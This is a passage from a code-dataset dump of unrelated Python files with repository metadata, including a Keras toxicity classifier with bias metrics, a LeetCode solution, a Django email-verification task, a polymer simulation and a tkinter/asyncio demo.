keras.preprocessing.text import Tokenizer\n\nfrom keras.utils import to_categorical\n\nfrom keras.preprocessing.sequence import pad_sequences\n\nfrom keras.layers import Embedding\n\nfrom keras.layers import Input\n\nfrom keras.layers import Conv1D\n\nfrom keras.layers import MaxPooling1D\n\nfrom keras.layers import Flatten\n\nfrom keras.layers import Dropout\n\nfrom keras.layers import Dense\n\nfrom keras.optimizers import RMSprop\n\nfrom keras.models import Model\n\nfrom keras.models import load_model\ntrain = pd.read_csv('../input/jigsaw-unintended-bias-in-toxicity-classification/train.csv')\n\n\n\n# Make sure all comment_text values are strings\n\ntrain['comment_text'] = train['comment_text'].astype(str) \n\n\n\n# List all identities\n\nidentity_columns = [\n\n 'male', 'female', 'homosexual_gay_or_lesbian', 'christian', 'jewish',\n\n 'muslim', 'black', 'white', 'psychiatric_or_mental_illness']\n\n\n\n# Convert taget and identity columns to booleans\n\ndef convert_to_bool(df, col_name):\n\n df[col_name] = np.where(df[col_name] >= 0.5, True, False)\n\n \n\ndef convert_dataframe_to_bool(df):\n\n bool_df = df.copy()\n\n for col in ['target'] + identity_columns:\n\n convert_to_bool(bool_df, col)\n\n return bool_df\n\n\n\ntrain = convert_dataframe_to_bool(train)\n\n#train.head(5)\n# #####################\n\n# ADDS WEIGHTS TO LABELS\n\n# #####################\n\n# x_train = preprocess(train['comment_text'])\n\n# weights = np.ones((len(x_train),)) / 4\n\n# # Subgroup\n\n# weights += (train[identity_columns].fillna(0).values>=0.5).sum(axis=1).astype(bool).astype(np.int) / 4\n\n# # Background Positive, Subgroup Negative\n\n# weights += (( (train['target'].values>=0.5).astype(bool).astype(np.int) +\n\n# (train[identity_columns].fillna(0).values<0.5).sum(axis=1).astype(bool).astype(np.int) ) > 1 ).astype(bool).astype(np.int) / 4\n\n# # Background Negative, Subgroup Positive\n\n# weights += (( (train['target'].values<0.5).astype(bool).astype(np.int) +\n\n# (train[identity_columns].fillna(0).values>=0.5).sum(axis=1).astype(bool).astype(np.int) ) > 1 ).astype(bool).astype(np.int) / 4\n\n# loss_weight = 1.0 / weights.mean()\n\n\n\n# y_train = np.vstack([(train['target'].values>=0.5).astype(np.int),weights]).T\n\n# y_aux_train = 
train[['target', 'severe_toxicity', 'obscene', 'identity_attack', 'insult', 'threat']].values\n\n# #####################\n\n# END OF WEIGHTS TO LABELS\n\n# #####################\ntrain_df, validate_df = model_selection.train_test_split(train, test_size=0.2)\n\nprint('%d train comments, %d validate comments' % (len(train_df), len(validate_df)))\n\ntrain_df.head()\n# #####################\n\n# Data Augmentation and Weights\n\n# #####################\n\n# Expands data set in the following ways:\n\n# NOTE: comment out to use one at a time.\n\n\n\n# #######################################\n\n# 1.) Adds previous competitions data to the training set. (done - tested)\n\n# #######################################\n\n# train_old = pd.read_csv('../input/jigsaw-toxic-comment-classification-challenge/train.csv')\n\n\n\n# # Obtains columns\n\n# id_col = train_old['id'].tolist()\n\n# toxic_col = train_old['toxic'].tolist()\n\n# comment_col = train_old['comment_text'].tolist()\n\n\n\n# # creates frame (values already bool)\n\n# old_lists = list(zip(id_col, toxic_col, comment_col))\n\n# old_frame = pd.DataFrame(old_lists, columns =['id', 'target', 'comment_text']) \n\n# # old_frame.head(10)\n\n\n\n# # appends frame\n\n# train_df = train_df.append(old_frame, ignore_index=True, sort=False)\n\n# train_df.fillna(0, inplace=True)\n\n# #train.tail(10)\n\n\n\n# #######################################\n\n# end\n\n# #######################################\n\n\n\n# #######################################\n\n# 2.) Removes subgroup positives. (tested)\n\n# #######################################\n\n# toxic = train_df.loc[train_df['target'] >= 0.5]\n\n\n\n# # obtains toxic subgroups\n\n# sub_pos_df = pd.DataFrame()\n\n# for ident in identity_columns:\n\n# sub_pos_df = pd.concat([ sub_pos_df, toxic.loc[toxic[ident] >= 0.5] ], axis=0)\n\n \n\n# # removes from train_df based on columns.\n\n# train_df = train_df.drop(sub_pos_df.index.values)\n\n\n\n# # # Sanity check\n\n# print('# Toxic Identities')\n\n# toxic = train_df[train_df['target'] >= 0.5]\n\n# for ident in identity_columns:\n\n# print(ident, toxic.loc[toxic[ident] >= 0.5].shape[0])\n\n# #######################################\n\n# end\n\n# #######################################\n\n\n\n# #######################################\n\n# 3.) Balance subgroup negatives via oversampling. (test)\n\n# #######################################\n\nnon_toxic = train_df[train_df['target'] < 0.5]\n\n\n\n# Finds the maximum subgroup negative group.\n\nmax_val = 0\n\nfor ident in identity_columns:\n\n val = non_toxic.loc[non_toxic[ident] >= 0.5].shape[0]\n\n if val >= max_val:\n\n max_val = val\n\nprint('balancing subgroup negatives to max value: ', max_val)\n\nprint('starting... ', train_df.shape[0])\n\n\n\n# Over samples data and appends data.\n\na = 0\n\nfor ident in identity_columns:\n\n # Creates local, deep copy for replacing.\n\n ident_df = non_toxic[non_toxic[ident] >= 0.5].copy(deep=True)\n\n val = max_val - ident_df.shape[0]\n\n ident_oversampled = ident_df.sample(n=val, replace=True)\n\n train_df = pd.concat([train_df, ident_oversampled], axis=0)\n\n a = a + ident_oversampled.shape[0]\n\n print('size : ', ident_df.shape[0])\n\n print('adding : ', ident_oversampled.shape[0])\n\n print('total : ', train_df.shape[0], '\\n')\n\n\n\n# Shuffles data\n\ntrain_df = train_df.sample(frac=1)\n\n \n\n# Sanity check\n\nprint('added... ', a)\n\nprint('final... 
', train_df.shape[0])\n\nnon_toxic = train_df[train_df['target'] < 0.5]\n\nfor ident in identity_columns:\n\n print(ident, non_toxic.loc[non_toxic[ident] >= 0.5].shape[0])\n\n# #######################################\n\n# end\n\n# #######################################\n\n\n\n# #######################################\n\n# 4.) Oversample subgroup negatives (extreme). (todo)\n\n# #######################################\n\n# non_toxic = train_df[train_df['target'] < 0.5]\n\n\n\n# # Over samples data and appends data.\n\n# max_val = 100000\n\n# a = 0\n\n# for ident in identity_columns:\n\n# # Creates local, deep copy for replacing.\n\n# ident_df = non_toxic[non_toxic[ident] >= 0.5].copy(deep=True)\n\n# val = max_val - ident_df.shape[0]\n\n# ident_oversampled = ident_df.sample(n=val, replace=True)\n\n# train_df = pd.concat([train_df, ident_oversampled], axis=0)\n\n# a = a + ident_oversampled.shape[0]\n\n# print('size : ', ident_df.shape[0])\n\n# print('adding : ', ident_oversampled.shape[0])\n\n# print('total : ', train_df.shape[0], '\\n')\n\n\n\n# # Shuffles data\n\n# train_df = train_df.sample(frac=1)\n\n \n\n# # Sanity check\n\n# print('added... ', a)\n\n# print('final... ', train_df.shape[0])\n\n# non_toxic = train_df[train_df['target'] < 0.5]\n\n# for ident in identity_columns:\n\n# print(ident, non_toxic.loc[non_toxic[ident] >= 0.5].shape[0])\n\n\n\n# #######################################\n\n# end\n\n# #######################################\n\n\n\n# #######################################\n\n# 5.) Over sample subgroup positives (fine-tuned). \n\n# #######################################\n\n\n\n\n\n# #######################################\n\n# end\n\n# #######################################\n# Augment: Remove Subgroup Pos.\n\n# subgroup pos = identity > 0.5 && target > 0.5\n\n# = full data w/o subgroups appended to subgroups non toxic.\n\n\n\n# obtains subgroup negatives.\n\n# s_neg = pd.DataFrame(data=None, columns=train_df.columns, index=train_df.index)\n\n# non_toxic = complete.loc[complete['target'] < 0.5]\n\n# for ident in identity_columns:\n\n# s_neg = s_neg.append(train_df.loc[non_toxic[ident >= 0.5]])\n\n\n\n# # obtain background pos/neg\n\n# background = pd.DataFrame(data=None, columns=train_df.columns, index=train_df.index)\n\n# for ident in identity_columns:\n\n# background = background.append(train_df.loc[train_df[ident < .5]])\n\nMAX_NUM_WORDS = 10000\n\nTOXICITY_COLUMN = 'target'\n\nTEXT_COLUMN = 'comment_text'\n\n\n\n# Create a text tokenizer.\n\ntokenizer = Tokenizer(num_words=MAX_NUM_WORDS)\n\ntokenizer.fit_on_texts(train_df[TEXT_COLUMN])\n\n\n\n# All comments must be truncated or padded to be the same length.\n\nMAX_SEQUENCE_LENGTH = 250\n\ndef pad_text(texts, tokenizer):\n\n return pad_sequences(tokenizer.texts_to_sequences(texts), maxlen=MAX_SEQUENCE_LENGTH)\n# IMPORTANT # ###########################\n\n# Ensure that the desired embedding is loaded and that the correct dimensions are set.\n\n# Different embedding files require various methods to be loaded. 
Ensure correct loading is uncommented.\n\n\n\nEMBEDDINGS_PATH = '../input/fasttext-wikinews/wiki-news-300d-1M.vec'\n\n#EMBEDDINGS_PATH = '../input/fasttext-crawl-300d-2m/crawl-300d-2M.vec'\n\n#EMBEDDINGS_PATH = '../input/nlpword2vecembeddingspretrained/glove.6B.300d.txt'\n\n#EMBEDDINGS_PATH = '../input/nlpword2vecembeddingspretrained/glove.6B.200d.txt'\n\n#EMBEDDINGS_PATH = '../input/glove-global-vectors-for-word-representation/glove.twitter.27B.200d.txt'\n\nEMBEDDINGS_DIMENSION = 300\n\n# #######################################\n\n\n\nDROPOUT_RATE = 0.3\n\nLEARNING_RATE = 0.00005\n\nNUM_EPOCHS = 10\n\nBATCH_SIZE = 128\n\n\n\ndef train_model(train_df, validate_df, tokenizer):\n\n # Prepare data\n\n train_text = pad_text(train_df[TEXT_COLUMN], tokenizer)\n\n train_labels = to_categorical(train_df[TOXICITY_COLUMN])\n\n validate_text = pad_text(validate_df[TEXT_COLUMN], tokenizer)\n\n validate_labels = to_categorical(validate_df[TOXICITY_COLUMN])\n\n \n\n# #####################\n\n# LOAD EMBEDDINGS\n\n# #####################\n\n# Commet out undesired embeddings. Only one embedding may be loaded at a time (with this model).\n\n embeddings_index = {}\n\n embedding_matrix = np.zeros((len(tokenizer.word_index) + 1,\n\n EMBEDDINGS_DIMENSION))\n\n\n\n# FASTEXT EMBEDDINGS ############################ (.vec)\n\n print('Loading word embeddings.')\n\n f = codecs.open(EMBEDDINGS_PATH, encoding='utf-8')\n\n for line in tqdm(f):\n\n values = line.rstrip().rsplit(' ')\n\n word = values[0]\n\n coefs = np.asarray(values[1:], dtype='float32')\n\n embeddings_index[word] = coefs\n\n f.close()\n\n print('Preparing embedding matrix.')\n\n words_not_found = []\n\n for word, i in tokenizer.word_index.items():\n\n embedding_vector = embeddings_index.get(word)\n\n if (embedding_vector is not None) and len(embedding_vector) > 0:\n\n # words not found in embedding index will be all-zeros.\n\n embedding_matrix[i] = embedding_vector\n\n else:\n\n words_not_found.append(word)\n\n print('number of null word embeddings: %d' % np.sum(np.sum(embedding_matrix, axis=1) == 0))\n\n# #################################################\n\n\n\n# GLOVE EMBEDDINGS # ############################## (.txt)\n\n# print('Loading Glove embeddings.')\n\n# with open(EMBEDDINGS_PATH) as f:\n\n# for line in f:\n\n# values = line.split()\n\n# word = values[0]\n\n# coefs = np.asarray(values[1:], dtype='float32')\n\n# embeddings_index[word] = coefs\n\n# print('Preparing embedding matrix.')\n\n# num_words_in_embedding = 0\n\n# for word, i in tokenizer.word_index.items():\n\n# embedding_vector = embeddings_index.get(word)\n\n# if embedding_vector is not None:\n\n# num_words_in_embedding += 1\n\n# # words not found in embedding index will be all-zeros.\n\n# embedding_matrix[i] = embedding_vector\n\n# # ################################################\n\n\n\n# WORD2VEC EMBEDDINGS ############################ (.bin)\n\n# word_vectors = KeyedVectors.load_word2vec_format(EMBEDDINGS_PATH, binary=True)\n\n# num_words_in_embedding = 0\n\n# for word, i in tokenizer.word_index.items():\n\n# if i >= MAX_NUM_WORDS:\n\n# continue\n\n# try:\n\n# embedding_vector = word_vectors[word]\n\n# embedding_matrix[i] = embedding_vector\n\n# except KeyError:\n\n# embedding_matrix[i] = np.zeros((EMBEDDINGS_DIMENSION))\n\n# ############################################### \n\n# #####################\n\n# END OF LOAD EMBEDDINGS\n\n# ##################### \n\n \n\n\n\n # Create model layers.\n\n def get_convolutional_neural_net_layers():\n\n \"\"\"Returns (input_layer, 
output_layer)\"\"\"\n\n sequence_input = Input(shape=(MAX_SEQUENCE_LENGTH,), dtype='int32')\n\n \n\n embedding_layer_static = Embedding(len(tokenizer.word_index) + 1,\n\n EMBEDDINGS_DIMENSION,\n\n weights=[embedding_matrix],\n\n input_length=MAX_SEQUENCE_LENGTH,\n\n trainable=False) \n\n \n\n# embedding_layer_non_static = Embedding(len(tokenizer.word_index) + 1,\n\n# EMBEDDINGS_DIMENSION,\n\n# weights=[embedding_matrix],\n\n# input_length=MAX_SEQUENCE_LENGTH,\n\n# trainable=True)\n\n\n\n # Hybrid: Nonstatic and Static\n\n# xs = embedding_layer_static(sequence_input)\n\n# xns = embedding_layer_non_static(sequence_input)\n\n# xs= Conv1D(128, 2, activation='relu', padding='same')(xs)\n\n# xns = Conv1D(128, 2, activation='relu', padding='same')(xns) \n\n# xs = MaxPooling1D(40, padding='same')(xs)\n\n# xns = MaxPooling1D(40, padding='same')(xns)\n\n# xs = Conv1D(128, 3, activation='relu', padding='same')(xs)\n\n# xns = Conv1D(128, 3, activation='relu', padding='same')(xns)\n\n# xs = MaxPooling1D(40, padding='same')(xs)\n\n# xns = MaxPooling1D(40, padding='same')(xns)\n\n# xs = Conv1D(128, 4, activation='relu', padding='same')(xs)\n\n# xns = Conv1D(128, 4, activation='relu', padding='same')(xns)\n\n# xs = MaxPooling1D(40, padding='same')(xs)\n\n# xns = MaxPooling1D(40, padding='same')(xns)\n\n# xs = Conv1D(128, 5, activation='relu', padding='same')(xs)\n\n# xns = Conv1D(128, 5, activation='relu', padding='same')(xns)\n\n# x = Maximum()([xs,xns])\n\n# x = MaxPooling1D(40, padding='same')(x)\n\n# x = Flatten()(x)\n\n# x = Dropout(DROPOUT_RATE)(x)\n\n# x = Dense(128, activation='relu')(x)\n\n# preds = Dense(2, activation='softmax')(x)\n\n # End of Hybrid: Static and Non Static\n\n\n\n # Static\n\n xs = embedding_layer_static(sequence_input)\n\n xs = Conv1D(128, 2, activation='relu', padding='same')(xs) \n\n xs = MaxPooling1D(40, padding='same')(xs)\n\n xs = Conv1D(128, 3, activation='relu', padding='same')(xs)\n\n xs = MaxPooling1D(40, padding='same')(xs)\n\n xs = Conv1D(128, 4, activation='relu', padding='same')(xs)\n\n xs = MaxPooling1D(40, padding='same')(xs)\n\n xs = Conv1D(128, 5, activation='relu', padding='same')(xs)\n\n xs = MaxPooling1D(40, padding='same')(xs)\n\n x = Flatten()(xs)\n\n x = Dropout(DROPOUT_RATE)(x)\n\n x = Dense(128, activation='relu')(x)\n\n preds = Dense(2, activation='softmax')(x)\n\n # End of Static\n\n \n\n # Non Static\n\n# xns = embedding_layer_non_static(sequence_input)\n\n# xns = Conv1D(128, 2, activation='relu', padding='same')(xns) \n\n# xns = MaxPooling1D(40, padding='same')(xns)\n\n# xns = Conv1D(128, 3, activation='relu', padding='same')(xns)\n\n# xns = MaxPooling1D(40, padding='same')(xns)\n\n# xns = Conv1D(128, 4, activation='relu', padding='same')(xns)\n\n# xns = MaxPooling1D(40, padding='same')(xns)\n\n# xns = Conv1D(128, 5, activation='relu', padding='same')(xns)\n\n# xns = MaxPooling1D(40, padding='same')(xns)\n\n# x = Flatten()(xns)\n\n# x = Dropout(DROPOUT_RATE)(x)\n\n# x = Dense(128, activation='relu')(x)\n\n# preds = Dense(2, activation='softmax')(x)\n\n # End of Nonstatic\n\n \n\n return sequence_input, preds\n\n\n\n # Compile model.\n\n print('compiling model')\n\n input_layer, output_layer = get_convolutional_neural_net_layers()\n\n model = Model(input_layer, output_layer)\n\n model.compile(loss='categorical_crossentropy',\n\n optimizer=RMSprop(lr=LEARNING_RATE), \n\n metrics=['acc'])\n\n\n\n # Train model.\n\n print('training model')\n\n model.fit(train_text,\n\n train_labels,\n\n batch_size=BATCH_SIZE,\n\n epochs=NUM_EPOCHS,\n\n 
validation_data=(validate_text, validate_labels),\n\n verbose=2)\n\n\n\n return model\n\n\n\nmodel = train_model(train_df, validate_df, tokenizer)\nMODEL_NAME = 'my_model'\n\nvalidate_df[MODEL_NAME] = model.predict(pad_text(validate_df[TEXT_COLUMN], tokenizer))[:, 1]\nvalidate_df.head()\nSUBGROUP_AUC = 'subgroup_auc'\n\nBPSN_AUC = 'bpsn_auc' # stands for background positive, subgroup negative\n\nBNSP_AUC = 'bnsp_auc' # stands for background negative, subgroup positive\n\n\n\ndef compute_auc(y_true, y_pred):\n\n try:\n\n return metrics.roc_auc_score(y_true, y_pred)\n\n except ValueError:\n\n return np.nan\n\n\n\ndef compute_subgroup_auc(df, subgroup, label, model_name):\n\n subgroup_examples = df[df[subgroup]]\n\n return compute_auc(subgroup_examples[label], subgroup_examples[model_name])\n\n\n\ndef compute_bpsn_auc(df, subgroup, label, model_name):\n\n \"\"\"Computes the AUC of the within-subgroup negative examples and the background positive examples.\"\"\"\n\n subgroup_negative_examples = df[df[subgroup] & ~df[label]]\n\n non_subgroup_positive_examples = df[~df[subgroup] & df[label]]\n\n examples = subgroup_negative_examples.append(non_subgroup_positive_examples)\n\n return compute_auc(examples[label], examples[model_name])\n\n\n\ndef compute_bnsp_auc(df, subgroup, label, model_name):\n\n \"\"\"Computes the AUC of the within-subgroup positive examples and the background negative examples.\"\"\"\n\n subgroup_positive_examples = df[df[subgroup] & df[label]]\n\n non_subgroup_negative_examples = df[~df[subgroup] & ~df[label]]\n\n examples = subgroup_positive_examples.append(non_subgroup_negative_examples)\n\n return compute_auc(examples[label], examples[model_name])\n\n\n\ndef compute_bias_metrics_for_model(dataset,\n\n subgroups,\n\n model,\n\n label_col,\n\n include_asegs=False):\n\n \"\"\"Computes per-subgroup metrics for all subgroups and one model.\"\"\"\n\n records = []\n\n for subgroup in subgroups:\n\n record = {\n\n 'subgroup': subgroup,\n\n 'subgroup_size': len(dataset[dataset[subgroup]])\n\n }\n\n record[SUBGROUP_AUC] = compute_subgroup_auc(dataset, subgroup, label_col, model)\n\n record[BPSN_AUC] = compute_bpsn_auc(dataset, subgroup, label_col, model)\n\n record[BNSP_AUC] = compute_bnsp_auc(dataset, subgroup, label_col, model)\n\n records.append(record)\n\n return pd.DataFrame(records).sort_values('subgroup_auc', ascending=True)\n\n\n\nbias_metrics_df = compute_bias_metrics_for_model(validate_df, identity_columns, MODEL_NAME, TOXICITY_COLUMN)\n\nbias_metrics_df\ndef calculate_overall_auc(df, model_name):\n\n true_labels = df[TOXICITY_COLUMN]\n\n predicted_labels = df[model_name]\n\n return metrics.roc_auc_score(true_labels, predicted_labels)\n\n\n\ndef power_mean(series, p):\n\n total = sum(np.power(series, p))\n\n return np.power(total / len(series), 1 / p)\n\n\n\ndef get_final_metric(bias_df, overall_auc, POWER=-5, OVERALL_MODEL_WEIGHT=0.25):\n\n bias_score = np.average([\n\n power_mean(bias_df[SUBGROUP_AUC], POWER),\n\n power_mean(bias_df[BPSN_AUC], POWER),\n\n power_mean(bias_df[BNSP_AUC], POWER)\n\n ])\n\n return (OVERALL_MODEL_WEIGHT * overall_auc) + ((1 - OVERALL_MODEL_WEIGHT) * bias_score)\n\n \n\nget_final_metric(bias_metrics_df, calculate_overall_auc(validate_df, MODEL_NAME))\ntest = pd.read_csv('../input/jigsaw-unintended-bias-in-toxicity-classification/test.csv')\n\nsubmission = pd.read_csv('../input/jigsaw-unintended-bias-in-toxicity-classification/sample_submission.csv', index_col='id')\nsubmission['prediction'] = model.predict(pad_text(test[TEXT_COLUMN], 
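A side note on the bias metric defined above: with p = -5 the generalized power mean leans strongly toward its smallest element, so one weak subgroup AUC dominates the final score. A small sketch with made-up AUC values (0.95/0.94/0.70 are hypothetical, for illustration only):

import numpy as np

def power_mean(series, p):
    # Same formula as the metric code above: (mean(x ** p)) ** (1 / p).
    return np.power(sum(np.power(series, p)) / len(series), 1 / p)

aucs = [0.95, 0.94, 0.70]
print(round(float(np.mean(aucs)), 3))         # 0.863 -- the arithmetic mean hides the weak subgroup
print(round(float(power_mean(aucs, -5)), 3))  # ~0.81 -- the negative exponent pulls toward the minimum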
tokenizer))[:, 1]\n\nsubmission.to_csv('submission.csv')","repo_name":"aorursy/new-nb-1","sub_path":"austvan_research.py","file_name":"austvan_research.py","file_ext":"py","file_size_in_byte":21676,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"7831921095","text":"import ast\nfrom doppelkopf.utils.Console import Console\nfrom doppelkopf.programs.Argument import Argument\n\nclass OptionalArgument(Argument):\n    def __init__(self, name, expectedType, defaultValue):\n        super(OptionalArgument, self).__init__(name, expectedType)\n        self.defaultValue = defaultValue\n\n    def TryAssign(self, arg: str) ->bool:\n        try:\n            if self.expectedType is bool:\n                if arg == \"True\":\n                    self.givenValue = True\n                elif arg == \"False\":\n                    self.givenValue = False\n                else:\n                    raise ValueError(\"Illegal argument\")\n            elif self.expectedType is list:\n                self.givenValue = ast.literal_eval(arg)\n            else:\n                self.givenValue = self.expectedType(arg)\n        except:\n            self.UseDefault()\n            Console.WriteError(\"Parameter '%s' could not be cast to the expected type %s (got '%s'). Using default %s instead\" % (self.name, str(self.expectedType), arg, str(self.defaultValue)))\n        self.isAssigned = True\n        return True\n    \n    def UseDefault(self):\n        self.givenValue = self.defaultValue","repo_name":"MalteHargarten/Doppelkopf_MA","sub_path":"src/doppelkopf/programs/OptionalArgument.py","file_name":"OptionalArgument.py","file_ext":"py","file_size_in_byte":1187,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"11461196388","text":"# -*- coding: utf-8 -*-\n# Given an integer array height of length n, there are n vertical lines; the two endpoints of the i-th line are (i, 0) and (i, height[i]).\n#\n# Find two of the lines such that, together with the x-axis, they form a container that can hold the most water.\n#\n# Return the maximum amount of water the container can store.\n#\n# Note: you may not slant the container.\n# Input: [1,8,6,2,5,4,8,3,7]\n# Output: 49\n# Explanation: the vertical lines represent the input array [1,8,6,2,5,4,8,3,7]. In this case, the maximum amount of water the container can hold (shown in blue in the figure) is 49.\n#\n# Source: LeetCode (力扣)\n# Link: https://leetcode.cn/problems/container-with-most-water\nfrom typing import List\n\n\nclass Solution:\n    def maxArea(self, height: List[int]) -> int:\n        i, j = 0, len(height) - 1\n        ans = 0\n        while i < j:\n            if height[i] < height[j]:\n                tmp = height[i] * (j - i)\n                i += 1\n                if tmp > ans:\n                    ans = tmp\n            else:\n                tmp = height[j] * (j - i)\n                j -= 1\n                if tmp > ans:\n                    ans = tmp\n        return ans\n","repo_name":"lisj1211/Algorithm","sub_path":"LeetCodeHot100/11. 盛最多水的容器.py","file_name":"11. 盛最多水的容器.py","file_ext":"py","file_size_in_byte":1119,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"8335663780","text":"\"\"\"__author__ = 叶小永\"\"\"\nfrom django.conf import settings\nfrom django.core.mail import send_mail\n\nfrom celery_tasks.main import app\n\n\n@app.task(name='send_verity_email')\ndef send_verity_email(to_email, verity_url):\n    subject = '美多商城邮箱验证'\n    html_message = '
<p>尊敬的用户,您好!</p>'\\n                   '<p>感谢您使用美多商城。</p>'\\n                   '<p>您的邮箱为:%s。请点击此链接激活您的邮箱:</p>'\\n                   '<p><a href=\"%s\">%s</a></p>' % (to_email, verity_url, verity_url)\n    # Send the verification email\n    send_mail(subject, \"\", settings.EMAIL_FROM, [to_email], html_message=html_message)\n\n","repo_name":"yeexy/HiBuy","sub_path":"celery_tasks/email/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"25440397397","text":"fname=input('Enter the file name:')\r\ntry:\r\n    fh=open(fname)\r\nexcept:\r\n    print(\"File not found\",fname)\r\n    quit()\r\ncount=0\r\nfor line in fh:\r\n    line=line.rstrip()\r\n    if not line.startswith(\"From \"):\r\n        continue\r\n    stuff=line.split()\r\n    count=count+1\r\n    print(stuff[1])\r\n","repo_name":"gagann17/daily-parctice","sub_path":"ass8.2.py","file_name":"ass8.2.py","file_ext":"py","file_size_in_byte":268,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"6023945024","text":"\"\"\"\nOpen a text file, then compute and print the number of characters, the number of lines and\nthe number of words in the file. Also print how many times each letter occurs in the\nfile (ignoring accented letters). Note: words are separated by one or more\nspace, tab, or newline characters.\n\"\"\"\n\nnames = open('files/names.txt').read()\n\nline = 0\nfor i in names.split('\\n'):\n    if i != '':\n        line = line + 1\n\ncharacter = 0\nfor j in names:\n    if j != '\\n':\n        character = character + 1\n\nword = 0\nfor p in names.split():  # split() with no argument splits on any whitespace, giving words rather than lines\n    word = word + 1\n\nprint(f'The file has {character} characters, {line} lines and {word} words')\n","repo_name":"eduardomingoranca/geek-university-projects-python","sub_path":"section_thirteen/exercises-section-thirteen/exercise12.py","file_name":"exercise12.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"9914965633","text":"import sys\nsys.stdin = open(\"C:/Users/dhxog/Desktop/파이썬 알고리즘 문제풀이(코딩테스트 대비)/섹션 3/8. 
곳감/in1.txt\",\"rt\")\nn = int(input())\na = [list(map(int, input().split())) for _ in range(n)]\nm = int(input())\nr = [list(map(int, input().split())) for _ in range(m)]\n\ndef rotation(x = list(), s=1, w=1):\n if s == 1:\n forward = x[:len(x) - w]\n backward = x[len(x)-w:]\n return backward + forward\n if s == 0:\n forward = x[:w]\n backward = x[w:]\n return backward + forward\n\n\nfor i in range(m):\n x = a[r[i][0]][:]\n s = r[i][1]\n w = r[i][2]\n\n a[r[i][0]][:] = rotation(x, s, w)\na \nres = 0\ns = 0\ne = n-1\nfor i in range(n):\n for j in range(s, e+1):\n res += a[i][j]\n if i < n//2:\n s += 1\n e -= 1\n else:\n s -= 1\n e += 1\n\nprint(res)\n","repo_name":"dhxoghks95/Python_Algorithm","sub_path":"section_3/Q8/8_oth.py","file_name":"8_oth.py","file_ext":"py","file_size_in_byte":852,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"25497549046","text":"import espressomd\nimport espressomd.interactions\nimport espressomd.polymer\nimport espressomd.io.writer.vtf # pylint: disable=import-error\n\nespressomd.assert_features([\"WCA\"])\n\nimport numpy as np\n\n# System parameters\n#############################################################\n\nsystem = espressomd.System(box_l=[100, 100, 100])\nnp.random.seed(seed=42)\n\nsystem.time_step = 0.01\nsystem.cell_system.skin = 0.4\nsystem.cell_system.set_n_square(use_verlet_lists=False)\noutfile = open('polymer.vtf', 'w')\n\nsystem.non_bonded_inter[0, 0].wca.set_params(epsilon=1, sigma=1)\n\nfene = espressomd.interactions.FeneBond(k=10, d_r_max=2)\nsystem.bonded_inter.add(fene)\n\n\npositions = espressomd.polymer.linear_polymer_positions(\n n_polymers=1, beads_per_chain=50, bond_length=1.0, seed=3210)\nprevious_part = None\nfor pos in positions[0]:\n part = system.part.add(pos=pos)\n if previous_part:\n part.add_bond((fene, previous_part))\n previous_part = part\n\nespressomd.io.writer.vtf.writevsf(system, outfile)\n\n\n#############################################################\n# Warmup #\n#############################################################\n\n# minimize energy using min_dist as the convergence criterion\nsystem.integrator.set_steepest_descent(f_max=0, gamma=1e-3,\n max_displacement=0.01)\nwhile system.analysis.min_dist() < 0.95:\n print(f\"minimization: {system.analysis.energy()['total']:+.2e}\")\n system.integrator.run(20)\n\nprint(f\"minimization: {system.analysis.energy()['total']:+.2e}\")\nprint()\nsystem.integrator.set_vv()\n\n# activate thermostat\nsystem.thermostat.set_langevin(kT=1.0, gamma=1.0, seed=42)\n\n\n#############################################################\n# Integration #\n#############################################################\n\nprint(\"simulating...\")\nt_steps = 1000\nfor t in range(t_steps):\n print(f\"step {t + 1} of {t_steps}\", end='\\r', flush=True)\n system.integrator.run(10)\n espressomd.io.writer.vtf.writevcf(system, outfile)\noutfile.close()\nprint()\n","repo_name":"espressomd/espresso","sub_path":"samples/minimal-polymer.py","file_name":"minimal-polymer.py","file_ext":"py","file_size_in_byte":2124,"program_lang":"python","lang":"en","doc_type":"code","stars":203,"dataset":"github-code","pt":"79"} +{"seq_id":"16818549283","text":"import tkinter as tk\nfrom tkinter import ttk\nimport asyncio\n\n\nclass App:\n async def exec(self):\n self.window = Window(asyncio.get_event_loop())\n await self.window.show()\n\n\nclass Window(tk.Tk):\n def __init__(self, loop):\n self.loop = loop\n self.root = tk.Tk()\n self.animation = \"░▒▒▒▒▒\"\n 
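As a side note to the slice-based rotation helper shown above: collections.deque expresses the same right/left rotation directly. A hedged equivalent sketch (an alternative idiom, not the original author's approach):

from collections import deque

def rotate(seq, right=True, w=1):
    d = deque(seq)
    d.rotate(w if right else -w)  # positive values rotate right, negative values rotate left
    return list(d)

assert rotate([1, 2, 3, 4, 5], right=True, w=2) == [4, 5, 1, 2, 3]
assert rotate([1, 2, 3, 4, 5], right=False, w=2) == [3, 4, 5, 1, 2]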
\n        self.label = tk.Label(text=\"\")\n        self.label.grid(row=0, columnspan=2, padx=(8, 8), pady=(16, 0))\n        \n        self.progressbar = ttk.Progressbar(length=280)\n        self.progressbar.grid(row=1, columnspan=2, padx=(8, 8), pady=(16, 0))\n        \n        button_block = tk.Button(text=\"Calculate Sync\", width=10, command=self.calculate_sync)\n        button_block.grid(row=2, column=0, sticky=tk.W, padx=8, pady=8)\n        \n        button_non_block = tk.Button(text=\"Calculate Async\", width=10, command=lambda: self.loop.create_task(self.calculate_async()))\n        button_non_block.grid(row=2, column=1, sticky=tk.W, padx=8, pady=8)\n\n    async def show(self):\n        while True:\n            self.label[\"text\"] = self.animation\n            self.animation = self.animation[1:] + self.animation[0]\n            self.root.update()\n            await asyncio.sleep(.1)\n\n    def calculate_sync(self):\n        max = 3000000\n        for i in range(1, max):\n            self.progressbar[\"value\"] = i / max * 100\n\n    async def calculate_async(self):\n        max = 3000000\n        for i in range(1, max):\n            self.progressbar[\"value\"] = i / max * 100\n            if i % 1000 == 0:\n                await 